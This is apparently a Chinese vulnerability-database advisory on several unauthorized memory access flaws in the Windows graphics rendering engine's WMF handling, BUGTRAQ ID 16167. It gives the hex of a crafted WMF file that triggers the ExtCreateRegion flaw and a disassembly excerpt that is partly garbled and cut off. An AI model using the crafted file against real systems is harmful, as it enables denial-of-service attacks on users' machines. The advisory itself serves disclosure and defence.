Microsoft Windows GRE WMF格式多个非授权内存访问漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

BUGTRAQ ID: 16167 Microsoft Windows是微软发布的非常流行的操作系统。 Microsoft Windows图形渲染引擎(GRE)在渲染WMF格式文件时存在多个非授权内存访问漏洞,攻击者可能利用此漏洞导致拒绝服务。 具体如下: 1. ExtCreateRegion调用导致非授权的内存访问 创建如下的WMF文件: 010009000003220000000100844300000000 //WMFHEAD 050000000B028B033F21 //first WMFRECORD 04000000FF0044444444444444444444FFFF33333333333333333333FFFF41424344 //the vul \ WMFRECORD 030000000000 //end WMFRECORD 问题代码如下: .text:7F00FE07 loc_7F00FE07: ; CODE XREF: \ PlayMetaFileRecord+1256j .text:7F00FE07 sub eax, 3 .text:7F00FE0A jnz loc_7F022B9A ; 0xff .text:7F00FE10 movzx ecx, word ptr [ebx+10h] ;get total \ "PointtStruct" number .text:7F00FE14 mov [ebp-88h], ecx ;save .text:7F00FE1A test ecx, ecx .text:7F00FE1C jnz short loc_7F00FE2E ;jmp .text:7F00FE1E xor eax, eax .text:7F00FE20 push eax ; int .text:7F00FE21 push eax ; int .text:7F00FE22 push eax ; int .text:7F00FE23 push eax ; int .text:7F00FE24 call CreateRectRgn .text:7F00FE29 jmp loc_7F010494 .text:7F00FE2E ; 哪哪哪哪哪哪哪哪Ù \ 38;哪哪哪哪哪哪哪哪哪哪 \...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息